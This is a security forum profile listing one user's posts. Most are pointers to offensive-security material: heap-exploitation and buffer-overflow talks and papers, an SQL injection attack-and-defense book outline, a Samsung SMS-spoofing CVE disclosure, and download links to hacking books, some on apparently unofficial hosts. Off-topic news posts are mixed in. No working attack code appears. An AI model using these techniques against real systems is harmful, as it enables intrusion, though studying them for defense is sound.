Posts: 18725
Days Won: 706
Everything posted by Nytro
English is mandatory in this field.
-
Source: AV Security Software Distribution - Distribuitor autorizat G Data Romania. In other words: G-Data. It is normal for them to promote their own product. All companies do the same. If you check their sites, ESET, Kaspersky, Avira, AVG, Bitdefender and all the others will state that they had the best results in the Virus Bulletin or AV Test tests. Info: http://eugene.kaspersky.com/2013/05/09/av-test-certification-devalued/ Something interesting: Eugene Kaspersky: Free AV Vendors Are Cheats
-
Syscan'11 Taipei - Modern Heap Exploitation Using The Low Fragmentation Heap
Description: Exploit mitigation technologies have made reliable heap exploitation increasingly difficult since the inception of the 4-byte overwrite, over ten years ago. At the same time, applications needed to become more stable without using absurd amounts of memory (who doesn't keep their web browser open with multiple tabs for days?). Heap memory management has matured over time, but with complex new code comes new opportunity for exploitation. This presentation will focus on understanding the Low Fragmentation Heap on Windows 7 (32-bit). After a foundation of integral concepts is laid, new exploitation techniques will be thoroughly discussed. Finally, we will use this newfound knowledge to leverage supposedly non-exploitable vulnerabilities.
For more information please visit: SyScan 2013
Source: Syscan'11 Taipei - Modern Heap Exploitation Using The Low Fragmentation Heap
-
What is this crap?
-
SQLi Attack Defense
Contents
Chapter 1 What Is SQL Injection?: Introduction; Understanding How Web Applications Work; A Simple Application Architecture; A More Complex Architecture; Understanding SQL Injection; High-Profile Examples; Understanding How It Happens; Dynamic String Building; Incorrectly Handled Escape Characters; Incorrectly Handled Types; Incorrectly Handled Query Assembly; Incorrectly Handled Errors; Incorrectly Handled Multiple Submissions; Insecure Database Configuration; Summary; Solutions Fast Track; Frequently Asked Questions
Chapter 2 Testing for SQL Injection: Introduction; Finding SQL Injection; Testing by Inference; Identifying Data Entry; GET Requests; POST Requests; Other Injectable Data; Manipulating Parameters; Information Workflow; Database Errors; Commonly Displayed SQL Errors; Microsoft SQL Server Errors; MySQL Errors; Oracle Errors; Application Response; Generic Errors; HTTP Code Errors; Different Response Sizes; Blind Injection Detection; Confirming SQL Injection; Differentiating Numbers and Strings; Inline SQL Injection; Injecting Strings Inline; Injecting Numeric Values Inline; Terminating SQL Injection; Database Comment Syntax; Using Comments; Executing Multiple Statements; Time Delays; Automating SQL Injection Discovery; Tools for Automatically Finding SQL Injection; HP WebInspect; IBM Rational AppScan; HP Scrawlr; SQLiX; Paros Proxy; Summary; Solutions Fast Track; Frequently Asked Questions
Chapter 3 Reviewing Code for SQL Injection: Introduction; Reviewing Source Code for SQL Injection; Dangerous Coding Behaviors; Dangerous Functions; Following the Data; Following Data in PHP; Following Data in Java; Following Data in C#; Reviewing PL/SQL and T-SQL Code; Automated Source Code Review; Yet Another Source Code Analyzer (YASCA); Pixy; AppCodeScan; LAPSE; Security Compass Web Application Analysis Tool (SWAAT); Microsoft Source Code Analyzer for SQL Injection; Microsoft Code Analysis Tool .NET (CAT.NET); Commercial Source Code Review Tools; Ounce; Source Code Analysis; CodeSecure; Summary; Solutions Fast Track; Frequently Asked Questions
Chapter 4 Exploiting SQL Injection: Introduction; Understanding Common Exploit Techniques; Using Stacked Queries; Identifying the Database; Non-Blind Fingerprint; Banner Grabbing; Blind Fingerprint; Extracting Data through UNION Statements; Matching Columns; Matching Data Types; Using Conditional Statements; Approach 1: Time-based; Approach 2: Error-based; Approach 3: Content-based; Working with Strings; Extending the Attack; Using Errors for SQL Injection; Error Messages in Oracle; Enumerating the Database Schema; SQL Server; MySQL; Oracle; Escalating Privileges; SQL Server; Privilege Escalation on Unpatched Servers; Oracle; Stealing the Password Hashes; SQL Server; MySQL; Oracle; Oracle Components; APEX; Oracle Internet Directory; Out-of-Band Communication; E-mail; Microsoft SQL Server; Oracle; HTTP/DNS; File System; SQL Server; MySQL; Oracle; Automating SQL Injection Exploitation; Sqlmap; Sqlmap Example; Bobcat; BSQL; Other Tools; Summary; Solutions Fast Track; Frequently Asked Questions
Chapter 5 Blind SQL Injection Exploitation: Introduction; Finding and Confirming Blind SQL Injection; Forcing Generic Errors; Injecting Queries with Side Effects; Splitting and Balancing; Common Blind SQL Injection Scenarios; Blind SQL Injection Techniques; Inference Techniques; Increasing the Complexity of Inference Techniques; Alternative Channel Techniques; Using Time-Based Techniques; Delaying Database Queries; MySQL Delays; Generic MySQL Binary Search Inference Exploits; Generic MySQL Bit-by-Bit Inference Exploits; SQL Server Delays; Generic SQL Server Binary Search Inference Exploits; Generic SQL Server Bit-by-Bit Inference Exploits; Oracle Delays; Time-Based Inference Considerations; Using Response-Based Techniques; MySQL Response Techniques; SQL Server Response Techniques; Oracle Response Techniques; Returning More Than One Bit of Information; Using Alternative Channels; Database Connections; DNS Exfiltration; E-mail Exfiltration; HTTP Exfiltration; Automating Blind SQL Injection Exploitation; Absinthe; BSQL Hacker; SQLBrute; Sqlninja; Squeeza; Summary; Solutions Fast Track; Frequently Asked Questions
Chapter 6 Exploiting the Operating System: Introduction; Accessing the File System; Reading Files; MySQL; Microsoft SQL Server; Oracle; Writing Files; MySQL; Microsoft SQL Server; Oracle; Executing Operating System Commands; Direct Execution; Oracle; DBMS_SCHEDULER; PL/SQL Native; Other Possibilities; Alter System Set Events; PL/SQL Native 9i; Buffer Overflows; Custom Application Code; MySQL; Microsoft SQL Server; Consolidating Access; Summary; Solutions Fast Track; Frequently Asked Questions; Endnotes
Chapter 7 Advanced Topics: Introduction; Evading Input Filters; Using Case Variation; Using SQL Comments; Using URL Encoding; Using Dynamic Query Execution; Using Null Bytes; Nesting Stripped Expressions; Exploiting Truncation; Bypassing Custom Filters; Using Non-Standard Entry Points; Exploiting Second-Order SQL Injection; Finding Second-Order Vulnerabilities; Using Hybrid Attacks; Leveraging Captured Data; Creating Cross-Site Scripting; Running Operating System Commands on Oracle; Exploiting Authenticated Vulnerabilities; Summary; Solutions Fast Track; Frequently Asked Questions
Chapter 8 Code-Level Defenses: Introduction; Using Parameterized Statements; Parameterized Statements in Java; Parameterized Statements in .NET (C#); Parameterized Statements in PHP; Parameterized Statements in PL/SQL; Validating Input; Whitelisting; Blacklisting; Validating Input in Java; Validating Input in .NET; Validating Input in PHP; Encoding Output; Encoding to the Database; Encoding for Oracle; Oracle dbms_assert; Encoding for Microsoft SQL Server; Encoding for MySQL; Canonicalization; Canonicalization Approaches; Working with Unicode; Designing to Avoid the Dangers of SQL Injection; Using Stored Procedures; Using Abstraction Layers; Handling Sensitive Data; Avoiding Obvious Object Names; Setting Up Database Honeypots; Additional Secure Development Resources; Summary; Solutions Fast Track; Frequently Asked Questions
Chapter 9 Platform-Level Defenses: Introduction; Using Runtime Protection; Web Application Firewalls; Using ModSecurity; Configurable Rule Set; Request Coverage; Request Normalization; Response Analysis; Intrusion Detection Capabilities; Intercepting Filters; Web Server Filters; Application Filters; Implementing the Filter Pattern in Scripted Languages; Filtering Web Service Messages; Non-Editable versus Editable Input Protection; URL/Page-Level Strategies; Page Overriding; URL Rewriting; Resource Proxying/Wrapping; Aspect-Oriented Programming (AOP); Application Intrusion Detection Systems (IDSs); Database Firewall; Securing the Database; Locking Down the Application Data; Use the Least-Privileged Database Login; Revoke PUBLIC Permissions; Use Stored Procedures; Use Strong Cryptography to Protect Stored Sensitive Data; Maintaining an Audit Trail; Oracle Error Triggers; Locking Down the Database Server; Additional Lockdown of System Objects; Restrict Ad Hoc Querying; Strengthen Controls Surrounding Authentication; Run in the Context of the Least-Privileged Operating System Account; Ensure That the Database Server Software Is Patched; Additional Deployment Considerations; Minimize Unnecessary Information Leakage; Suppress Error Messages; Use an Empty Default Web Site; Use Dummy Host Names for Reverse DNS Lookups; Use Wildcard SSL Certificates; Limit Discovery via Search Engine Hacking; Disable Web Services Description Language (WSDL) Information; Increase the Verbosity of Web Server Logs; Deploy the Web and Database Servers on Separate Hosts; Configure Network Access Control; Summary; Solutions Fast Track; Frequently Asked Questions
Chapter 10 References: Introduction; Structured Query Language (SQL) Primer; SQL Queries; SELECT Statement; UNION Operator; INSERT Statement; UPDATE Statement; DELETE Statement; DROP Statement; CREATE TABLE Statement; ALTER TABLE Statement; GROUP BY Statement; ORDER BY Clause; Limiting the Result Set; SQL Injection Quick Reference; Identifying the Database Platform; Identifying the Database Platform via Time Delay Inference; Identifying the Database Platform via SQL Dialect Inference; Combining Multiple Rows into a Single Row; Microsoft SQL Server Cheat Sheet; Enumerating Database Configuration Information and Schema; Blind SQL Injection Functions: Microsoft SQL Server; Microsoft SQL Server Privilege Escalation; OPENROWSET Reauthentication Attack; Attacking the Database Server: Microsoft SQL Server; System Command Execution via xp_cmdshell; xp_cmdshell Alternative; Cracking Database Passwords; Microsoft SQL Server 2005 Hashes; File Read/Write; MySQL Cheat Sheet; Enumerating Database Configuration Information and Schema; Blind SQL Injection Functions: MySQL; Attacking the Database Server: MySQL; System Command Execution; Cracking Database Passwords; Attacking the Database Directly; File Read/Write; Oracle Cheat Sheet; Enumerating Database Configuration Information and Schema; Blind SQL Injection Functions: Oracle; Attacking the Database Server: Oracle; Command Execution; Reading Local Files; Reading Local Files (PL/SQL Injection Only); Writing Local Files (PL/SQL Injection Only); Cracking Database Passwords; Bypassing Input Validation Filters; Quote Filters; HTTP Encoding; Troubleshooting SQL Injection Attacks; SQL Injection on Other Platforms; PostgreSQL Cheat Sheet; Enumerating Database Configuration Information and Schema; Blind SQL Injection Functions: PostgreSQL; Attacking the Database Server: PostgreSQL; System Command Execution; Local File Access; Cracking Database Passwords; DB2 Cheat Sheet; Enumerating Database Configuration Information and Schema; Blind SQL Injection Functions: DB2; Informix Cheat Sheet; Enumerating Database Configuration Information and Schema; Blind SQL Injection Functions: Informix; Ingres Cheat Sheet; Enumerating Database Configuration Information and Schema; Blind SQL Injection Functions: Ingres; Microsoft Access; Resources; SQL Injection White Papers; SQL Injection Cheat Sheets; SQL Injection Exploit Tools; Password Cracking Tools; Solutions Fast Track
Index
Download: http://rogunix.com/docs/WebSecurity/SQLi%20Atack%20defense.pdf
-
Rogunix: http://rogunix.com/docs/
-
Syngress Zero Day Exploit: Countdown to Darkness
The realistic portrayals of researching, developing, and ultimately defending the Internet from a malicious "Zero-Day" attack will appeal to every corner of the IT community. Although fictional, the numerous accounts of real events and references to real people will ring true with every member of the security community. This book will also satisfy those not on the "inside" of this community, who are fascinated by the real tactics and motives of criminal, malicious hackers and those who defend the Internet from them.
Download: http://library.back2hack.cc/books/Other/Syngress_-_Zero_Day_Exploit_-_Countdown_to_Darkness_%5B%5D_%282004%29_en.pdf
-
Sockets, Shellcode, Porting, and Coding: Reverse Engineering Exploits and Tool Coding for Security Professionals
James C Foster - April 2005
Syngress - Publisher
Description: The book is logically divided into 5 main categories, with each category representing a major skill set required by most security professionals: 1. Coding – The ability to program and script is quickly becoming a mainstream requirement for just about everyone in the security industry. This section covers the basics in coding, complemented with a slew of programming tips and tricks in C/C++, Java, Perl and NASL.
Download: http://www.multiupload.nl/50NRESVUMM
I searched for a while before finding it.
-
Buffer Overflow Attacks
The buffer overflow is the whipping boy of software security. The main reason for the omnipresent discussion and hype surrounding the buffer overflow is that the buffer overflow remains the principal method used to exploit software by remotely injecting malicious code into a target. Although the techniques of buffer overflow have been widely published elsewhere, this chapter remains a necessity. The buffer overflow has evolved over the years, as have a number of other attack techniques and, as a result, powerful new buffer overflow attacks have been developed. If nothing else, this chapter will serve as a foundation as you come to grips with the subtle nature of buffer overflows.
Download: http://library.back2hack.cc/books/Hacking/Syngress_-_Buffer_Overflow_Attacks_-_Detect_Exploit_and_Prevent_%5B%5D_%282000%29_en.pdf
-
Buffer-Overflow Vulnerabilities and Attacks
1 Memory
In the PC architecture there are four basic read-write memory regions in a program: Stack, Data, BSS (Block Started by Symbol), and Heap. The data, BSS, and heap areas are collectively referred to as the "data segment". In the tutorial titled "Memory Layout And The Stack" [1], Peter Jay Salzman described memory layout in great detail.
Stack: The stack is typically located in the higher parts of memory. It usually "grows down": from high addresses to low addresses. The stack is used whenever a function call is made.
Data Segment
– Data area: contains global variables used by the program that are not initialized to zero. For instance the string "hello world" defined by char s[] = "hello world" in C would exist in the data part.
– BSS segment: starts at the end of the data segment and contains all global variables that are initialized to zero. For instance a variable declared static int i would be contained in the BSS segment.
– Heap area: begins at the end of the BSS segment and grows to larger addresses from there. The heap area is managed by malloc, realloc, and free. The heap area is shared by all shared libraries and dynamic load modules in a process.
Download: http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Buffer_Overflow.pdf
-
Blended Attacks Exploits, Vulnerabilities and Buffer-Overflow Techniques in Computer Viruses
By Eric Chien and Péter Ször, Symantec Security Response
Contents: Abstract; Definition of a Blended Attack; Introduction; Background; Types of Vulnerability; Buffer Overflows; Second Generation; Third Generation; URL Encoding and Canonicalization; MIME Header Parsing; Applications Rights Verification; System Modification; Network Enumeration; Current and Previous Threats; Buffer Overflow Details; Exception Frame Vulnerability; Buffer Overflow Usage in Computer Viruses; Current Security; Combating Blended Threats in the Future; Summary; References; Appendix A; Appendix B; About the Authors
Download: http://www.symantec.com/avcenter/reference/blended.attacks.pdf
-
Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade
Crispin Cowan, Perry Wagle, Calton Pu, Steve Beattie, and Jonathan Walpole
Department of Computer Science and Engineering, Oregon Graduate Institute of Science & Technology (crispin@cse.ogi.edu)
http://www.cse.ogi.edu/DISC/projects/immunix
Abstract: Buffer overflows have been the most common form of security vulnerability for the last ten years. Moreover, buffer overflow vulnerabilities dominate the area of remote network penetration vulnerabilities, where an anonymous Internet user seeks to gain partial or total control of a host. If buffer overflow vulnerabilities could be effectively eliminated, a very large portion of the most serious security threats would also be eliminated. In this paper, we survey the various types of buffer overflow vulnerabilities and attacks, and survey the various defensive measures that mitigate buffer overflow vulnerabilities, including our own StackGuard method. We then consider which combinations of techniques can eliminate the problem of buffer overflow vulnerabilities, while preserving the functionality and performance of existing systems.
Download: http://css.csail.mit.edu/6.858/2011/readings/buffer-overflows.pdf
-
[h=1]Nokia Lumia Design Competition - contest with prizes worth 3000 euros[/h]
by Redactia Hit | 17 July 2013
Nokia challenges the most inspired young design and illustration enthusiasts to discover the new Lumia 520 smartphone in a competition that sets their imagination in motion: Nokia Lumia Design Competition. To prove that it is the most fun smartphone, the phone's detachable back will become a canvas that participants can personalize without any restriction. "They have to give the phone a personal touch, through a unique and original creation that is, at the same time, a personal creative and amusing manifesto. No idea is too bold as long as it demonstrates that even a small surface, such as a smartphone's case, can be turned into the coolest medium for artistic expression," the Nokia announcement states. The competition takes place on the creative platform The Creator. As entries are submitted, they can be voted on by the two juries. Between 17 July and 16 September, the entries will be evaluated by a jury of professionals (made up of Nokia and IQads representatives and personalities from the fields of design, advertising and marketing), but also by the general public, through the competition page. At the end of the competition, 3 prizes will be awarded, with a total value of 3,000 euros. The first-prize winner will receive 1,500 euros, second place will receive 1,000 euros and third place 500 euros. The winners will also each receive a Nokia Lumia 520 smartphone with the design they created. Source: IQads
Source: Nokia Lumia Design Competition - concurs cu premii de 3000 de euro | Hit.ro
-
Timesnewroman.ro - Independent daily of voluntary humor - Feared Romanian hackers complain that NASA's servers contain neither manele nor torrents
-
[h=1]HotNews.ro interview: Sebastian Ghita, PSD deputy - We will submit a legislative initiative to allow the interception of prepaid phone cards. The secret services must have PRISM-type tools for surveillance of the internet in cases of terrorism and economic crime[/h]
by Robert Mihailescu HotNews.ro Wednesday, 17 July 2013, 10:56
PSD deputy Sebastian Ghita wants to submit a legislative initiative that would allow the secret services to intercept prepaid phone cards. Concretely, when a person buys such a card, they will have to present their personal numeric code (CNP) and, if a judge later orders the interception of the phone number associated with that card, the secret services will be able to identify the card's holder. The PSD deputy, a member of the joint standing Committee of the Chamber of Deputies and the Senate for parliamentary oversight of SRI's activity, and also the person who controls the Romania TV television station, is in favour of implementing a PRISM program in Romania that would allow surveillance of internet communications in cases of suspected terrorism or serious economic crime, arguing against critics that privacy protection is often invoked "but what is actually being defended is the freedom to commit crimes". Sebastian Ghita justifies his initiative by the fact that this area, prepaid cards, has remained "totally uncovered" and is used for economic crimes. In addition, there is the risk of these cards being used in terrorism-related activities. Below are statements made by Sebastian Ghita in an interview given to HotNews.ro on Tuesday, in which he talks about cyber-security, the interception of prepaid cards, the possibility of the secret services setting up undercover companies, public procurement and his personal relationship with Prime Minister Victor Ponta.
Sebastian Ghita: There is a discussion now at the level of the SRI Committee, and among parliamentarians together with the government, concerning how this area, which has remained totally uncovered, we are unable to have a legally managed way of dealing with prepaid cards; I repeat, this concern exists, to find a solution. We want to find a solution regarding the management of prepaid cards. I am not necessarily referring to the prepaid cards bought so far, which are losing their validity, are no longer used and are slowly going out of use, but we have to create a legal framework through which, given that these Romanian prepaid cards can be used for crimes, they can be registered and have the same regime as ordinary phones. Why? We all saw what happened in Iasi; many cases like the one in Bulgaria, crimes, and I am also referring to terrorism, to economic crimes, unfortunately have prepaid cards as an instrument for hiding from the authorities. There are prepaid cards that allow data traffic, there are prepaid cards that do not allow the user to be identified. Concretely, when someone buys a card (...) they will have to present proof with CNP, first name, surname and address. This data will be centralized by an authority and, in the case of a wiretap request, the operator must be able to provide the CNP, first name and surname of the person who used a given card. This is not a personal initiative; either we will find a way to convince the government to come up with such an initiative, or several of us (parliamentarians) will submit it in Parliament. I am struggling to convince some colleagues now and I have already had discussions with a few; in the autumn we will begin the steps for this matter.
Reporter: Was there a request from outside Romania for this initiative?
S.G.: Very often we use this thing about requests from abroad so that we do something ourselves. The reality is that I do not want to see my children kidnapped in the street, nor do I want to see a bomb go off in a hotel, and I do not believe that in the name of civil liberties we should allow ourselves the luxury of being unsafe, of leaving ourselves exposed. There is a big hole in this matter for the safety of us all. I do not think someone from abroad still has to come and tell us what to do. I have had meetings with the committees of other states that deal with legislation and I asked them, I have read reports, on how other countries legislate. Technology is advancing very fast and after all that is what we committed to in society; we did not become deputies to want badges and to wander around there, through Parliament, through Nea Nicu's building. I have discussed this initiative within PSD as well; there is reticence, a fear of exposing yourself publicly as a politician with such an initiative, but being a politician does not mean running from responsibility so that nothing can be held against you; in the end you have to tell people, I did this, I took responsibility for this, I believe in this, and I believe that through the experience gained in the IT industry, close to the world of computing, the world of communications, the cyberworld or the information society, I can take on the role of being a member of a team that pushes such things. Our legislation is old, technology has advanced a great deal; I am 34 and will soon have two children, right now I have only one. I think with dread that something bad might happen. I do not know how we will all react. If we do not do what is necessary now, we will all kick ourselves later. We as politicians, instead of going out in public and explaining that in fact we do not want to record you, to listen to you like madmen, pointlessly, at any time, but only when it is found that in certain crimes such as terrorism, the areas of horrendous tax evasion, of organized crime, such methods of hiding from the authorities are used, then the operator should be able to say: for me, Popescu bought the card.
As regards cyber-security policy, things will gain momentum and the discussion about what information we take from the somewhat public space, namely Facebook, Google, other data taken from other sites, social media, about citizens of Romania and those abroad who target Romania, will become more important than what happens with cards or phones or wiretaps. You should know that today the information found on the net is often much more valuable than a phone conversation. The circle of relationships, the friendships, the type of messages; you can much more quickly figure out the idiotic impulses, of terrorism, of an attacker, of a madman, of an individual from Facebook or from the way he expresses himself on blogs, how he comments on newspaper articles, than from a conversation he has with his girlfriend. And so, I believe efforts have been made and Romania will have to make huge efforts now, to quickly take the step towards the technological update in order to be able to capture such information very quickly and also use it. Information is useless if you capture it but cannot also use it.
Reporter: I understand you might be considering a PRISM program for Romania?
S.G.: Yes, I strongly believe that the Romanian services should, either in relation with the other partners abroad or directly themselves, build such tools. If they have not already built them. In any case, a warrant from a judge, because without a warrant from a judge nothing can be discussed, today includes the possibility that a citizen has all electronic means of communication intercepted, here referring also to what he did in the past, on social networks, on the internet, and believe me, the logs, the histories, show you everything, what he does now and what he does during the period of the warrant. They must think about this urgently and we must allocate them financial resources so that (the secret services, ed.) are able to collect this information. It is pointless for us to argue with them on television and accuse them if today we do not give them resources and do not help them; after all it is our country, our life; if we do not decide to leave here and live in Germany and believe that the services there protect us and that the society there is better organized, then we must organize the one here. Quickly. Older people, older leaders, older politicians sometimes do not understand at all what it is about and at other times understand roughly, understand that it is something complicated...
Reporter: Abroad there have been very critical reactions to such initiatives.
S.G.: From the pseudo-caring about society. Whom should I trust more? Someone from the services who, supposedly, would abuse this information, or a madman who wants to blow up a university campus with a bomb he found somewhere in his village? I will tell you now, we will trust those from the services more; this is the reality across the globe and we have to get used to it.
Reporter: Will the debate about the police state being built in Romania, as alleged by members of some parties, be reopened?
S.G.: I have not noticed a greater concern in one party or another; in all parties there are these concerns and they generally target the component where, supposedly, the services enter the area of corruption or the area of economic crime. Those in the parties must also get used to the fact that their organizations are not a gathering of crooks and the corrupt from everywhere, but must put their work in the service of society.
Reporter: And regarding the accusations of intrusion into private life?
S.G.: The discourse overlaps and is often perverse. Private life is used, but what is actually being defended is the freedom to commit crimes. Private life, yes, must be protected; the capacity to harm society must not be protected, and I do not think a politician will be found to do evil against human freedoms, but I also do not think we should keep sitting idle and tolerating so many evils in the name of freedom and human rights. Tomorrow you will see that prostitution rings move from the disco in Mizil to Facebook; in fact they have already moved, you know it well. 15-year-old Romanian girls will be recruited from Facebook and the pimps will no longer be in Romania, they will be in Palma de Mallorca, and we must be able to block this, otherwise we will be cannon fodder. In Romania today the greatest asset we have is our safety. Our children are not kidnapped, politicians or businessmen are not shot as in Bulgaria, you are not blackmailed on the street corner by who knows what petty crooks, none of this happens.
Reporter: You are a member of the joint standing Committee of the Chamber of Deputies and the Senate for parliamentary oversight of SRI's activity. Will the national security laws be approved before or after the amendment of the Constitution?
S.G.: There have been discussions in the committees regarding the discussion of the reports, in our case SRI's, and there have been discussions regarding the drafting of a new legislative package. Today (Tuesday, ed.) we are awaiting an opinion from the Committee chairman, Mr Georgian Pop, to give us more information about the relation to the new constitution. Do we make the security laws under the conditions of the old constitution, with CSAT, with a certain type of organization, or do we make them by defining the beneficiaries and the informational needs? There are many voices saying that if we are doing something, let's do it properly. We did not make the national security laws under the old constitution and now we make them a year before making the new constitution? I too tend to believe that it is better to measure ten times and do something once than to make new security laws every year, laws that are very important.
Reporter: Will these laws also include the possibility of the secret services setting up undercover companies?
S.G.: I looked, amused, at the public debate about companies set up undercover; from what I know of the legislative framework, and I have studied it well, there is no possibility for Romania's intelligence services to set up undercover companies. This notion does not exist in the law, nor do I think they can present Parliament with requests for such resources; it would be a major distortion of the market and I would not encourage the setting up of undercover companies by the intelligence services. I think there are 'n' means to act abroad and at home to gather information, and I do not think the notion of an undercover company makes sense; I do not think it can exist in a democratic society and in a society that has defined the concept of a market economy. The services have no business setting up undercover companies.
Reporter: Since we are talking about legislative initiatives, are you also considering amending the law that raised the threshold for public procurement?
S.G.: I have worked quite a lot, it will be 17 years of work in this area, public procurement, state budgets, and I consider that more flexibility and an increase in the thresholds up to which direct purchases can be made is useful. Even so, the law stipulates very clearly how this can be done; you still have to have three offers from the market. Of course many of us might suspect that they are arranged, that we ask for three offers from whoever we want and the one who is supposed to win wins. But that is a crime. The Court of Accounts, the tax directorates, other state authorities can catch at any time a mayor who rigs a 30,000-euro public procurement. We must also give mayors, company directors, the presumption of good faith; we must also, not sensitize them, nor motivate them, but make them accountable.
Noi ti-am dat 100.000 de euro pe mana sa zugravesti, varuiesti, sa angajezi un constructor, tu ai grija sa o faci bine, pentru ca vine milita. Reporter: Premierul Ponta parea nemultumit de modificarile operate in Parlament. S.G. Cred ca nu acolo a fost nemultumirea, vizavi de pragurile acestea, ci nemultumire a fost la faptul ca acele companii, Romgaz, Transgaz, Electrica, care inca au capital majoritar de stat, ar putea sa se sustraga legii achizitiilor publice. Din cum il stiu eu pe domnul prim ministru Ponta, nu va permite asa ceva. Toate companiile vor aplica OUG 34. Reporter: Si pentru ca am amintit de premierul Ponta, o parte a presei a speculat rececnt ca exista o 'racire' a relatiilor. S.G. Nu am vazut (relatarile din presa, n.r.), relatiile sunt acelasi, evident, primul ministru Ponta nu mai are timpul, rabdarea si posibiltiatea sa se raporteze la vechile relatii la fel cum se raporta pana acum. Asa ca in mod evident are alte responsabilitati in societate, si eu m-as bucura sa-si vada de ele, nu sa stea toata ziua la bere cu prietenii sau la distractii, Asa ca mi-as dori foarte mult sa reuseasca tot ce si-a propus. Si ecihpa lui, din care fac si eu parte, eu mi-as dori sa reuseasca cat mai multe, nu m-ar deranja absolut deloc o racire a relatiilor, sper ca timpul pe care nu-l mai aloca prietenilor si familiei si distractiei sa-l aloce cat mai bine treburilor guvernamentale. Cel putin chestiunea vizitelor externe si relatiilor externe si dezghetarea lor suntem toti mandri si incantati, nu credeam vreodata ca in sase luni de zile dl prim ministru va putea sa alerge atat de tare si de mult si sa si obtina atatea vizite importante la nivel inalt. Sursa: Interviu HotNews.ro: Sebastian Ghita, deputat PSD -Vom depune o initiativa legislativa care sa permita interceptarea cartelelor telefonice pre-platite. Serviciile secrete trebuie sa dispuna de instrumente de tipul PRISM pentru supravegherea internetu MUIE! 
And so maybe this is how I'll start a project of my own, an older idea...
-
US orders release of justification for spying

Court tells government to publish legal basis for Prism programme's warrantless monitoring of millions of communications

Last Modified: 17 Jul 2013 01:35

A US court has ordered the Obama administration to declassify a 2008 court decision justifying the Prism spying programme revealed last month by whistleblower Edward Snowden.

The ruling, issued earlier this week, will show how the state has legally justified its covert data collection programmes under the Foreign Intelligence Surveillance Act.

Judge Reggie Walton of the Foreign Intelligence Surveillance Court issued the ruling to declassify the decision. The government is expected to decide by August 26 which parts of the 2008 decision may be published.

The scope and scale of Prism, which collects millions of private foreign communications with American citizens, was leaked to the media last month by Snowden. Its operation is overseen by the FIS Court and its appeals body, the FIS Court of Review.

The ruling to declassify comes after a challenge by the internet firm Yahoo on the constitutionality of the programme. It and a number of internet firms, including Facebook, Google, AOL and Microsoft, were compelled to provide information to the National Security Agency (NSA), which runs Prism.

A statement from Yahoo on Tuesday said that it was "very pleased" with the court's ruling.

"Once those documents are made public, we believe they will contribute constructively to the ongoing public discussion around online privacy," Yahoo said.

NSA sued

Meanwhile, 19 organisations represented by the Electronic Frontier Foundation (EFF) have filed a suit against the NSA for violating their right of association by illegally collecting their call records.

The coalition includes a Unitarian church group, gun ownership advocates, and a broad coalition of membership and political advocacy groups.

"The First Amendment protects the freedom to associate and express political views as a group, but the NSA's mass, untargeted collection of Americans' phone records violates that right by giving the government a dramatically detailed picture into our associational ties," Cindy Cohn, the legal director for the EFF, said.

"Who we call, how often we call them, and how long we speak shows the government what groups we belong to or associate with, which political issues concern us, and our religious affiliation.

"Exposing this information – especially in a massive, untargeted way over a long period of time – violates the Constitution and the basic First Amendment tests that have been in place for over 50 years."

Data requests

Meanwhile a number of major US Internet companies, including Microsoft, Google and Facebook, have asked the government for permission to disclose the number of national security-related user data requests they receive.

Also on Tuesday, Microsoft published a lengthy letter to US Attorney General Eric Holder asking for greater freedom to publicly discuss how it turns over user information to the government.

The letter was a response to a report in The Guardian newspaper that said Microsoft had given authorities the ability to circumvent encryption of Outlook emails and to capture Skype online chats. The company says that report is inaccurate.

Source: Agencies

Source: US orders release of justification for spying - Americas - Al Jazeera English
-
Samsung Galaxy S3/S4 SMS Spoofing

Authored by Z.X.

The Samsung Galaxy S3 and S4 phones come with a pre-loaded application that allows for spoofing and creation of arbitrary SMS content.

Hi list,

I would like to inform you that the details of the vulnerability in a built-in system app of the Samsung Galaxy S3/S4 (assigned CVE-2013-4763 and CVE-2013-4764) are now disclosed to the public.

In the Samsung Galaxy S3/S4, a pre-loaded app, i.e., sCloudBackupProvider.apk, is used to provide backup functionality for the users, and it unintentionally exposes several unprotected components. By exploiting these unprotected components, an unprivileged app can trigger a so-called "restore" operation to write SMS messages back to the standard SMS database file (mmssms.db) used by the system messaging app, i.e., SecMms.apk. As a result, a smishing attack can effectively create and inject arbitrary (fake) SMS text messages. Similarly, fake MMS messages and call logs are also possible. This vulnerability has been disclosed in CVE-2013-4763.

Also, these components can be sequentially triggered in a specific order to create arbitrary SMS content, inject it into the system-wide SMS database, and then trigger the built-in SMS-sending behavior (to an arbitrary destination). This vulnerability has been disclosed in CVE-2013-4764.

QIHU Inc. discovered these vulnerabilities and informed Samsung Corp. on June 10, 2013. Samsung confirmed the vulnerability and is now preparing an OTA update. As a temporary workaround, disabling the sCloudBackupProvider.apk app would help block known attack vectors.

Details of CVE-2013-4763 and CVE-2013-4764 can also be found on QIHU Inc.'s official site:
http://shouji.360.cn/securityReportlist/CVE-2013-4763.html
http://shouji.360.cn/securityReportlist/CVE-2013-4764.html

Regards,
Z.X. from QIHU Inc.

Source: Samsung Galaxy S3/S4 SMS Spoofing - Packet Storm
-
Selinux For Dummies

Description: SELinux For Dummies - LinuxFest Northwest 2013 Presentation by Gary Smith, Information System Security Officer, Molecular Science Computing, Pacific Northwest National Laboratory, Richland, WA.

In the beginning, the Unix file system's Discretionary Access Control (DAC) security model was simple and elegant. For decades, it was good enough for most situations, but as increasing security demands were put on DAC, it began to run out of steam. Security Enhanced Linux (SELinux) was created by the National Security Agency (NSA) to be the most mature and complete response to the need for more secure Linux systems. Even though many distributions come with SELinux enabled by default, many system administrators disable SELinux out of fear their applications won't run. This is no longer acceptable. Today everything from cell phones to supercomputers needs high quality security.

Imagine being able to sandbox applications such as your web browser, email client, or even a virtual machine. Traditional Linux security makes this difficult or next to impossible. SELinux, however, makes this fine-grained security available to everyone. When it first arrived, SELinux seemed harder to learn and more mysterious than Quantum Mechanics. As a result, system administrators feared it. It's time to lay fear aside. SELinux for Dummies will show you what SELinux is, why it's a great addition to the security arsenal, and how to maintain and troubleshoot it.

For More Information Please Visit: linuxfestnorthwest.org

Source: Selinux For Dummies
-
The Linux Audit Framework

Description: The Linux Audit Framework - LinuxFest Northwest 2013 Presentation by Gary Smith, Information System Security Officer, Molecular Science Computing, EMSL, Pacific Northwest National Laboratory, Richland, WA.

